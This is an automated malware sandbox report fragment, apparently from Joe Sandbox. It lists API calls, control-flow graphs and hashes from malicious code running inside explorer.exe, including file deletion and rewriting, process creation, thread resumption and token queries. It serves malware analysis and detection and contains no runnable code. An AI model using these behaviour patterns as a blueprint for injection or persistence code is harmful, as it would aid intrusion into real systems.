                                                                                                                                                                                                                              • Opcode ID: e7b8fa26b1a46e4451f164796a8aa0d70886c8553f4a6f570b2b5b6e62293461
                                                                                                                                                                                                                              • Instruction ID: 9f061de1d210f4a400a2d32dd115765f872ca70c77a20f8c03b394387b0e7083
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7b8fa26b1a46e4451f164796a8aa0d70886c8553f4a6f570b2b5b6e62293461
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35E1FC34608A4C8FDF94EF28C895E9AB7F1FFA9305F114699E44ACB265DB30E944CB41
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetUserNameW.ADVAPI32 ref: 034434E4
                                                                                                                                                                                                                                • Part of subcall function 034435E8: CoCreateInstance.COMBASE ref: 03443635
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateInstanceNameUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3213660374-0
                                                                                                                                                                                                                              • Opcode ID: 81035dc135677410a02395aba5b8c5453cb28373790a056210d4eb3fa598bf54
                                                                                                                                                                                                                              • Instruction ID: 190d4ac172e9b5995e58a2a779de72d56e9b4391d963f806ad7758d4bc28f9a6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81035dc135677410a02395aba5b8c5453cb28373790a056210d4eb3fa598bf54
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0114834718B4C4FDBD0EF6D901876EB6E2FBDC200F400A7EA84ECB255DA7889458B85

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create$Thread$CloseHandleHeap
                                                                                                                                                                                                                              • String ID: %g?$iP+
                                                                                                                                                                                                                              • API String ID: 371905858-765743493
                                                                                                                                                                                                                              • Opcode ID: ecbd1e2d1eb921e9ea06e1ae0500806f7f4f0c51e5794f8bcf7d88cb65ea9a7b
                                                                                                                                                                                                                              • Instruction ID: f9993c0a013a155e7304275817b0aa28680cf6b9a657587bfb3bf6939bc197cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecbd1e2d1eb921e9ea06e1ae0500806f7f4f0c51e5794f8bcf7d88cb65ea9a7b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A91C830618A088FDF14EF19DC826A573D6FB98301B48417E9C4ECF256DA34E982DB96

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32 ref: 03441F8E
                                                                                                                                                                                                                              • CopyFileW.KERNEL32 ref: 03441F9D
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32 ref: 03441FAE
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32 ref: 03441FF9
                                                                                                                                                                                                                                • Part of subcall function 03444920: SetFileAttributesW.KERNEL32 ref: 0344496F
                                                                                                                                                                                                                                • Part of subcall function 03444920: CreateFileW.KERNEL32 ref: 03444999
                                                                                                                                                                                                                                • Part of subcall function 03444920: SetFileTime.KERNEL32 ref: 034449C4
                                                                                                                                                                                                                              • CreateFileW.KERNEL32 ref: 03442085
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Delete$Create$AttributesCopyTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 642576546-0
                                                                                                                                                                                                                              • Opcode ID: e9731c391335859cd68f5fed700ca15d06b8495037da1be80876dbaa4d1617e7
                                                                                                                                                                                                                              • Instruction ID: 74ab40000fd9de54ee6bde68ea299fea1bdf80e84e1e1d756b1db66c1052c39a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9731c391335859cd68f5fed700ca15d06b8495037da1be80876dbaa4d1617e7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56418D24718B4C4FEBA8EFAD941836E71D2EB8C211F10457FA90ECB385DE748D068789

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 158 344230c-3442369 call 3443de0 161 3442817 158->161 162 344236f-3442374 158->162 164 344281d-3442837 161->164 162->161 163 344237a-344237d 162->163 163->161 165 3442383-344238e 163->165 166 3442394-34423c7 call 3444fc8 165->166 167 3442807-344280d call 3445348 165->167 166->167 173 34423cd-34423f2 call 3444f1c call 34450dc 166->173 171 3442812-3442815 167->171 171->161 171->164 178 34423f4-344240e 173->178 179 344241d 173->179 178->179 184 3442410-344241b 178->184 180 3442422-344243b call 34450dc 179->180 185 3442441-3442454 180->185 186 34425aa-34425b2 180->186 184->180 189 34424a6-34424a8 185->189 190 3442456-344249d 185->190 187 344279d-34427ca call 3443de0 186->187 188 34425b8-34425bc 186->188 204 34427cc-34427d3 187->204 205 34427ff-3442805 187->205 191 3442664-34426f4 call 34446a0 call 3443444 call 3443de0 call 3445348 188->191 192 34425c2-34425ca 188->192 189->186 194 34424ae-3442520 call 3445368 DeleteFileW CreateFileW 189->194 190->189 191->167 195 34425d0-34425dd 192->195 196 34426f9-3442726 call 3443de0 192->196 215 3442522-3442579 call 3444f1c call 3444fc8 WriteFile 194->215 216 344259f-34425a5 call 3445348 194->216 195->205 211 34425e3-34425e6 195->211 196->205 213 344272c-3442733 196->213 204->205 209 34427d5-34427d8 204->209 205->167 209->205 214 34427da-34427fa call 3442840 call 3445348 209->214 211->205 217 34425ec-34425f0 211->217 213->205 218 3442739-344273c 213->218 214->205 253 3442582-344259a call 3444920 call 34452cc 215->253 216->186 224 3442657-344265e 217->224 225 34425f2-344261f call 3443de0 217->225 218->205 227 3442742-344279b call 3442840 call 34446a0 call 3445348 218->227 224->191 224->205 237 3442651-3442655 225->237 238 3442621-3442628 225->238 227->205 237->224 237->225 238->237 243 344262a-344262d 238->243 243->237 247 344262f-344264c call 3442840 call 3445348 243->247 247->237 253->216
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateDeleteWrite
                                                                                                                                                                                                                              • String ID: |:|
                                                                                                                                                                                                                              • API String ID: 2199199414-3736120136
                                                                                                                                                                                                                              • Opcode ID: 9040bef6d448ccb6289fd7aa145a130caf9b4baa9b6cb73fa6352a9bf28ca752
                                                                                                                                                                                                                              • Instruction ID: 88589cdca582af04a1fad3e29c4951b420c2542b0865dd2c86297385d7d3c4f0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9040bef6d448ccb6289fd7aa145a130caf9b4baa9b6cb73fa6352a9bf28ca752
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37E1B730718F484FE759EB6894592AAB6D1FB98311F140A3FE49FC7280DF74E902874A

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03444C90: GetVolumeInformationA.KERNEL32 ref: 03444CFD
                                                                                                                                                                                                                              • CreateMutexExA.KERNEL32 ref: 03441DFF
                                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32 ref: 03441EB1
                                                                                                                                                                                                                              • SleepEx.KERNEL32 ref: 03441EEE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create$FileInformationMappingMutexSleepVolume
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3744091137-0
                                                                                                                                                                                                                              • Opcode ID: 7aa97a72d667d6e7631d82889301dab56f55e5304ad79d64984249ffe4174cbc
                                                                                                                                                                                                                              • Instruction ID: a1c1cce70364ebf8b55d98427e81acd6ace2b35ad96eb2daeaa978d3bd99f80c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7aa97a72d667d6e7631d82889301dab56f55e5304ad79d64984249ffe4174cbc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93416F34714F088FFB64EB7980587ABB6D2EB98306F144A3F905EDA241CF7496429789

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$AttributesCreateTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1986686026-0
                                                                                                                                                                                                                              • Opcode ID: 74ea676ed02ce2377571a80dead8b1a094930347c2c6fc5d14f4583f9d63d04d
                                                                                                                                                                                                                              • Instruction ID: ed6ac36031dd3f4661806f2763383fcdeb2f6ef9f18365125fb26ca2ae3d5d73
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74ea676ed02ce2377571a80dead8b1a094930347c2c6fc5d14f4583f9d63d04d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8421003071CB488FDF64EF68988879EB6E2FBDC701F10456EA85ED7245DA34DA058782

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 325 3442cd0-3442cfe call 34432ec 328 3442d04-3442d0f 325->328 329 3442f92-3442fa2 325->329 328->329 330 3442d15-3442d17 328->330 331 3442f7d-3442f8d call 34452cc 330->331 332 3442d1d-3442d26 330->332 331->329 332->331 334 3442d2c-3442d33 332->334 334->331 335 3442d39-3442d6f call 3444d8c 334->335 335->331 340 3442d75-3442d94 call 3444518 335->340 343 3442f67-3442f78 call 34452cc * 2 340->343 344 3442d9a-3442d9b 340->344 343->331 346 3442d9d-3442dbf 344->346 350 3442f55-3442f60 346->350 351 3442dc5-3442de0 call 3444fc8 346->351 350->343 351->350 354 3442de6-3442dea 351->354 354->350 355 3442df0-3442e02 354->355 356 3442e04-3442e06 355->356 357 3442e0c-3442e31 call 3444578 355->357 356->357 358 3442f34-3442f4f SleepEx 356->358 361 3442e37-3442ee9 call 3445328 call 3442fac 357->361 362 3442f29-3442f2f call 34452cc 357->362 358->346 358->350 373 3442efa-3442f0a ResumeThread call 34452cc 361->373 374 3442eeb-3442ef3 361->374 362->358 376 3442f0f-3442f22 373->376 374->373 376->362
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 034432EC: CreateFileW.KERNEL32 ref: 03443332
                                                                                                                                                                                                                                • Part of subcall function 034432EC: ReadFile.KERNEL32 ref: 03443379
                                                                                                                                                                                                                              • ResumeThread.KERNEL32 ref: 03442EFE
                                                                                                                                                                                                                              • SleepEx.KERNEL32 ref: 03442F43
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateReadResumeSleepThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3143597149-0
                                                                                                                                                                                                                              • Opcode ID: f5820b8ea5cff059e2ca65d3897565f173a588097ec6688a9389ae85ed4efe19
                                                                                                                                                                                                                              • Instruction ID: 3f3f2ad367d684c2546de454aaf7dbeb565e1fa67215880915d3d3eaaf2a0e1a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5820b8ea5cff059e2ca65d3897565f173a588097ec6688a9389ae85ed4efe19
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF71A830708F499FE769EB28C4587AAB3E1FB98311F54453EE49EC7241DF74A8428785

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 379 34432ec-344333f CreateFileW 380 34433b5-34433b8 379->380 381 3443341-3443351 379->381 382 3443420-3443421 380->382 383 34433ba-34433bd 380->383 388 3443353-3443387 call 3445328 ReadFile 381->388 389 34433ac-34433ad 381->389 384 3443423-344343c 382->384 383->382 385 34433bf-34433e1 call 3445328 call 3444f1c 383->385 395 34433e3-3443406 385->395 396 344338f-34433a3 call 3444fc8 388->396 389->380 401 3443408-344341e call 34452cc * 2 395->401 396->389 400 34433a5-34433a6 396->400 400->389 401->384
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateRead
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3388366904-0
                                                                                                                                                                                                                              • Opcode ID: badfb69e866206bf1aec5894b37ec2a863fdc2aed447bd11c369af276a4e727e
                                                                                                                                                                                                                              • Instruction ID: b430f4b18dd3ebfaaf63b5e6800fb7e0af9bd63f524a049362754fec1b4a86ff
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: badfb69e866206bf1aec5894b37ec2a863fdc2aed447bd11c369af276a4e727e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A41C23471CF0D4FE758EA6CA8593BAB2D2FB89611F14027FA49BC7341EE24981247C6

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 406 3444e00-3444e49 call 3444f1c 410 3444ed3-3444f02 call 34452cc ObtainUserAgentString 406->410 411 3444e4f 406->411 413 3444e51-3444e93 call 3444f1c RegQueryValueExA 411->413 417 3444e95-3444eb4 call 34452cc call 34450dc 413->417 418 3444f03 call 34452cc 413->418 421 3444f08-3444f0d 417->421 427 3444eb6-3444ec7 417->427 418->421 424 3444f0f 421->424 425 3444ec9-3444eca 421->425 424->413 425->410 427->425
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32 ref: 03444E85
                                                                                                                                                                                                                              • ObtainUserAgentString.URLMON ref: 03444EEE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AgentObtainQueryStringUserValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4107646653-0
                                                                                                                                                                                                                              • Opcode ID: 14967515942ab5f3155c187ddb7612eac1b6b4b83ea38ca3825b558acf83a191
                                                                                                                                                                                                                              • Instruction ID: ad30cf3265cc3e2bf3982c31c803f821f28c9a1cca725dfce4ead410328750ef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14967515942ab5f3155c187ddb7612eac1b6b4b83ea38ca3825b558acf83a191
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8631A635608B4C8FEF18EF69D8496EA77E5FB98310B10027FD85ACB245EE7098064795

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE ref: 03444A94
                                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE ref: 03444ACB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InformationToken
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4114910276-0
                                                                                                                                                                                                                              • Opcode ID: c16b9007777c5fbaa3f53cde1809afd9184394dfa0c7ae21d454d4480f8148c1
                                                                                                                                                                                                                              • Instruction ID: 21878226d7fd0a21662a5e096697a7a178302cec00be2da7b3858d9076f961f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c16b9007777c5fbaa3f53cde1809afd9184394dfa0c7ae21d454d4480f8148c1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48213134608B488FCB54EB28D49866AB7F1FB99311B000A6EE49AC7264DB70E845DB81

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 443 3443cd0-3443ce0 444 3443d06-3443d14 443->444 445 3443ce2-3443d04 EnumWindows SleepEx 443->445 445->444 445->445
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnumSleepWindows
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 498413330-0
                                                                                                                                                                                                                              • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                                                                                                                              • Instruction ID: c6f934a4a6e984e28e85a4ddf0a2c148637f639aaf71550a5984d1df9672677e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1E04F306046098FFB28EFA4C4D8BB136A1EB18206F18017BDC0EDD285CB764955C724

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 446 3443f7c-3443fbd 447 3443fc6-344400c call 3445328 call 3445274 call 3444434 446->447 448 3443fbf-3443fc1 446->448 456 344400e-3444018 447->456 457 344401a-3444020 447->457 450 344439c-34443b7 448->450 458 3444022-3444030 456->458 457->458 460 3444036-344406d 458->460 461 344438e-3444394 call 34452cc 458->461 466 3444383-3444384 460->466 467 3444073-344409e 460->467 463 3444399-344439a 461->463 463->450 466->461 467->466 469 34440a4-34440b9 467->469 470 344410f-3444114 469->470 471 34440bb-34440bd 469->471 472 3444117-3444150 470->472 471->472 473 34440bf-34440db call 3444f1c 471->473 477 3444156-344415c 472->477 478 3444350-344435d 472->478 479 34440dd-34440f4 call 3444fc8 473->479 480 34440f9-344410d call 3444f1c 473->480 481 344417e-3444188 477->481 482 344415e-344417b 477->482 492 344435f-3444365 call 34452cc 478->492 493 344436a-344436d 478->493 479->480 480->472 485 3444233-3444259 481->485 486 344418e-3444199 481->486 482->481 501 3444332-3444343 485->501 502 344425f-3444270 485->502 490 34441a0-344422b call 3444f1c call 3445328 call 3445384 call 3444f1c call 34443c0 call 34452cc * 3 486->490 491 344419b 486->491 490->485 491->490 492->493 496 344436f-3444375 call 34452cc 493->496 497 344437a-3444380 493->497 496->497 497->466 501->478 508 3444345-344434b call 34452cc 501->508 502->501 507 3444276-34442a1 502->507 515 34442a3-34442ad 507->515 508->478 517 34442cd-34442eb 515->517 518 34442af-34442cb RtlReAllocateHeap 515->518 522 34442ed 517->522 523 34442ef-34442f4 517->523 518->517 522->523 523->515 525 34442f6-3444301 523->525 527 3444322-344432a 525->527 528 3444303-3444309 call 3445368 525->528 527->501 532 344430e-3444318 528->532 532->527
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 03da1ff889cf56ce5b15326bb5d87766f4294a11689bde974b35e737c0aadbcd
                                                                                                                                                                                                                              • Instruction ID: 780c50c8444a718a785d90643d6b78df299e7c2577df40f9b7077719bf020fa2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03da1ff889cf56ce5b15326bb5d87766f4294a11689bde974b35e737c0aadbcd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63D18F30718B098FEB54EF6994457AEB7E2FB98701F10453EE44AD7341EE74E8028B86
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateProcessInternalW.KERNEL32 ref: 0344465C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2186235152-0
                                                                                                                                                                                                                              • Opcode ID: c6ea0675358742ce16f6cf21072778e4d3517b6488bd88ff55d4cd9cd9108430
                                                                                                                                                                                                                              • Instruction ID: 385e3ae0e44210943c66b66e2d465640ce19d6a597420aa25231e6e44e560322
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6ea0675358742ce16f6cf21072778e4d3517b6488bd88ff55d4cd9cd9108430
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF316D30708F484FDB94EF69908875AB6E2FB98311F104A6FA44EDB345DF74D8458B85
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32 ref: 03444CFD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InformationVolume
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2039140958-0
                                                                                                                                                                                                                              • Opcode ID: 1d0cb5fe9283983f3568e12a9bb75b7ec9ed7c5609916c5b8e7118791da650f8
                                                                                                                                                                                                                              • Instruction ID: a73196bbcc993117c734c59621bbd709bc66f62f4ebe102e499543991c8b6fe0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d0cb5fe9283983f3568e12a9bb75b7ec9ed7c5609916c5b8e7118791da650f8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40316730618B4C8FDB64EF68D448BAA77E1FBA8311F10466F984EDB264DE30D9458B81
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 034419D0: RtlCreateHeap.NTDLL ref: 03441AE7
                                                                                                                                                                                                                              • SleepEx.KERNEL32(?,?,?,?,?,?,?,03441973), ref: 034419A0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_3441000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateHeapSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 221814145-0
                                                                                                                                                                                                                              • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                                                                                                                              • Instruction ID: 269ef93fb9452de5007bd924a25b24036bccb1b67fe5d58d108b4df4213cbed0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61E04814714B085FFB94F77A948473D61A1DBC8150F54157FA51FCE285D934C8C5C716
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: tP^q
                                                                                                                                                                                                                              • API String ID: 0-2862610199
                                                                                                                                                                                                                              • Opcode ID: 7bd0378bf95ac04c53e495b4a2244f35a6ba345b8b68ac115d5982420c4ee976
                                                                                                                                                                                                                              • Instruction ID: a71876d5aad16c59ef1b68e11fef6479daada0749b370f8216a58f663ade3618
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bd0378bf95ac04c53e495b4a2244f35a6ba345b8b68ac115d5982420c4ee976
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF410E317412508FCB09AB78C85886D7BB2EF8975632504AEE406CF376DE75CC82CB91
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 8bq
                                                                                                                                                                                                                              • API String ID: 0-187764589
                                                                                                                                                                                                                              • Opcode ID: bed90f9a6706141b056933f57a02a68e1cf82370dadd2dfecb9b77dafe31b93c
                                                                                                                                                                                                                              • Instruction ID: 0f5206f73f593ef65b586671faec691f82f962ce48039eba1b681d890ce8f27a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bed90f9a6706141b056933f57a02a68e1cf82370dadd2dfecb9b77dafe31b93c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FF027742012405FC702E7B9E550EA9BBF1DF89308B0440ADE085CF3BADAA59C8BDB80
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
